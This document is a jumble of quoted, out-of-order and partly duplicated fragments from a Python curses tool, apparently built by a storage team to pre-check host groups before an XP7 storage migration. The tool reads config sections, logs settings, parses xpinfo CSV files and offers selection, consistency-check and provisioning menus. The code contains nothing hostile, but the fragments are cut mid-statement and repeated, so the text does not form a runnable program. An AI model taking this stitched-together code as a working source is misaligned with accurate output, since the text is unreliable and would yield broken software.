"logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### #########################",
"n > 0: if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list)",
"self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh()",
"update(self): \"\"\" update the selection items list to match the new search criteria",
"not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display))",
"= window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list =",
"ConfigParser import ConfigParser import sys import os import os.path import csv import string",
"select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups",
"elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels()",
"fits in the window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end =",
"not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value",
"sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect",
"= min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for",
"self.window.getmaxyx() ### items is a dict ### self.items = items self.filtered_items = copy.copy(self.items.keys())",
"current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self): return",
"def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line >= self.width:",
"1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate ::",
"panel.update_panels() self.display_list = [] def navigate(self,n): if n < 0: if self.slice_start >=",
"logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir))",
"[ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break",
"add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added",
"self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width",
"PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS",
"self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]:",
"config file 2.0 Consistency check update 2.1 Add xpinfo file processing CONFIG :",
"box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr",
"to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ###",
"panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the",
"= 0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def",
"hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent",
"= line[:self.width-1] ### only add lines in the slice ### # logger.debug(\"SelectMenu.display ::",
"### process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader =",
"del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\")",
"Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection",
"the selection items list to match the new search criteria \"\"\" if self.search.get()",
"= [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH",
"= {} instance_dict = {} site_dict = {} collectfile_dict = {} box_dict =",
"select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO",
"if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break else: self.items[self.position][1]()",
"if self.position < 0: self.position = 0 elif self.position >= len(self.filtered_items): self.position =",
"self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we received the response ### self.update_object.set(self.reply)",
"= ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait",
"= {} serialnbr_dict = {} instance_dict = {} site_dict = {} collectfile_dict =",
"20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define title_win ### title_win",
"search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display()",
":\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\")",
"{}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update ::",
"to examine hostgroup is ready for migration AUTHOR : <NAME> / StorageTeam VERSION",
"list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know",
"copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0",
"selection self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent",
"self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match search str {}\".format(self.search.get())) self.filtered_items",
"window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel =",
":\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict)",
"break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict",
"XP7 Migration, Precheck DESCRIPTION : Precheck to examine hostgroup is ready for migration",
"get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill",
"for x in self.consistent])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border()",
"self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate()",
"Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win =",
"items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end",
"### clear screen ### stdscr.clear() ### check window heigth and width ### if",
"### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ###",
"select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups",
"curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object):",
"dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir",
"as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8:",
"= {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging",
"else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if",
"= {}\".format(self.position,n )) ### adjust slice ### if n < 0: if self.position",
"if self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start =",
"{\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1)",
"self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up",
"PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey()",
"sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu",
"+= n if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start +",
"import string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict =",
"- self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice",
"hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item =",
"in xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name = row[1] ldev_nbr",
"curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[]",
"self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display ### self.slice_start = 0",
"else: err_msg = \"No HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg)",
"self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\"",
"in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1:",
"line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item)",
"self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window =",
"def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() ### items is a dict",
"defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined,",
"display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in",
"self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if",
"self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate ::",
"= 0 def navigate(self,n): self.position += n if self.position < 0: self.position =",
"self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide()",
"{} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known",
"cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section",
"= 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir =",
"= 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self): \"\"\" update the",
"class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel =",
"line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr()",
"for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] =",
"= selection self.search = search def update(self): \"\"\" update the selection items list",
"= 0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n",
"exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name #####################",
"= Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ### parse",
"self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo files",
"VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict = {} instance_dict =",
"self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to display ###",
"def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection =",
"for index,item in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else: mode",
"self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\"))",
"mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1]",
"search def update(self): \"\"\" update the selection items list to match the new",
"clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr):",
"if self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start =",
"selection ### for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding",
"ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for",
"hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)",
"by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict = {} for boxpair_name",
"- 6) self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0",
"self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key",
"= int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"):",
"= value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\")",
"in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match search all\")",
"= len(self.xpinfo_file_list) - 1 if n < 0: if self.position - self.slice_start <",
"= stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win =",
"self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end =",
"for index,item in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT else: mode",
"navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start += n if",
"hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)",
"search str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else:",
"TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search",
"key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list) -",
"key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break else: self.items[self.position][1]() elif",
"= self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply =",
"a view on the items which fits in the window ### self.slice_start =",
"{}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate()",
"this SEARCH expression\",stdscr) search.display() ### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection =",
"mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {},",
"##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK ended\")",
"len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in",
"box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### ##################### logfile",
"{} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ###",
"self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide",
"= 100 boxpair_dict = {} serialnbr_dict = {} instance_dict = {} site_dict =",
"self.panel.hide() panel.update_panels() self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position +=",
"self.position < 2 and self.slice_end < len(self.filtered_items) - 1: ### slide slice down",
"= self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end = 0",
"def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"n > 0: if self.slice_end < len(self.display_list) - 1: self.slice_end += n if",
"to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now",
"if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in",
"during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what",
"# logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start <= index <=",
"index,item in enumerate(self.items): if index == self.position: mode = curses.A_STANDOUT else: mode =",
"8: hostname = row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8])",
"hostgroups by name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name",
": <NAME> / StorageTeam VERSION : Based on previous ODR framework 1.0 Initial",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object =",
"for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display ###",
"in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name] else:",
"= 0 self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end",
"{}\".format(self.position,n )) ### adjust slice ### if n < 0: if self.position -",
"20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ###",
"- 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to",
"### select hostgroups by name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()):",
"= box_name ##################### ### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger =",
"= ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing",
"= xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo",
"else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear()",
"elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr):",
"to the selection ### for box_name in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO",
"except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr",
"NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir:",
"0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0",
"logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for",
"len(self.xpinfo_file_list) - 1: ### slide slice down ### self.slice_end += n if self.slice_end",
"search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display() ###",
"self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end - self.position",
"self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width",
"box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name)",
"logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter)",
"input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ###",
"result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list",
"in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ###",
"__init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel =",
"self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def",
"in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### ##################### logfile =",
"self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display()",
"migration AUTHOR : <NAME> / StorageTeam VERSION : Based on previous ODR framework",
"def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0",
"match the new search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update",
"if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select",
"[curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ### for box_name,hostgroup_name in self.consistent.get():",
"copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the items which fits in",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection =",
"= window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show",
"temporary horcm file and daemon to pairdisplay & check on status #################################################################################################### \"\"\"",
"100 boxpair_dict = {} serialnbr_dict = {} instance_dict = {} site_dict = {}",
"self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if",
"= Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict =",
"collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg",
"show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show",
"== curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() ####################################################################################################",
"= items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is a view on the",
"cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\")",
"new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by",
"{}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif",
"self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice down ### self.slice_end += n",
"instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in",
"logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL",
"self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent = [] def display(self): self.window.clear() line",
